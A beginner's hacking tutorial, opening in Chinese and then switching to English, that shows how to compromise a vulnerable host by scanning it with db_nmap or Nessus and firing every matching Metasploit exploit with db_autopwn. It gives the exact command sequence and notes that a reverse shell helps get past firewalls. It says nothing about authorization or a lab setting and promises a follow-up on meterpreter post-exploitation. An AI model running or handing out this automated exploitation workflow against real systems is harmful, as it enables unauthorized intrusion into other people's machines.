今天我们来看看溢出一台有漏洞的主机对于新手来说最基础也是最简单的一种方法,需要的工具有:
nmap
Nessus
Metasploit
当然你也可以用直接Backtrack 5的系统,因为以上工具都已集成在此系统中了。
首先Nmap的作用就是扫描目标主机开放的端口和服务,于是db_autopwn命令就针对开放的端口和开启的服务尝试运行溢出代码。而且它的扫描和溢出结果可以导入到更为细腻的审计工具Nessus中。
在Metasploit中,首先要建立一个数据库,运行msfconsole,并连接数据库之后就可以开始尝试我们Backtrack上的初次攻击了。于是我们也顺便练习下英文~~
db_autopwn所提供的参数
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
The ones marked in bold are the ones that we will use in this guide. However option “-r” is also quite useful, as a reverse shell has a higher chance of bypassing a firewall once you have successfully exploited a host. Also you can use “-q” if you don’t want to see all the module executions during autopwn.
First we will look into using db_nmap.
You need to scan the host(s) for open ports so that autopwn knows which ports are open.
db_nmap -sV [IP]
Then you just execute autopwn:
db_autopwn -p -e
Now just watch as the exploits ‘flow’. When they finish you can check if any of the exploits succeeded by doing:
sessions -l
The other method, which I personally find more effective is using Nessus to predetermine the vulnerabilities of the target host. After a successful scan has finished, go to Reports, select the scan you had just done and there is a button called “Download report”. Save it as .nessus somewhere on your HDD.
Then in msfconsole do:
db_import /path/to/.nessus
db_autopwn -x -e
Once again you will see the flow of exploits (unless you specified the -q option as well). To check if any of the exploits actually worked, once again do
sessions -l
I will soon post about what can be done once the host has been exploited successfully and a guide on using the meterpreter session.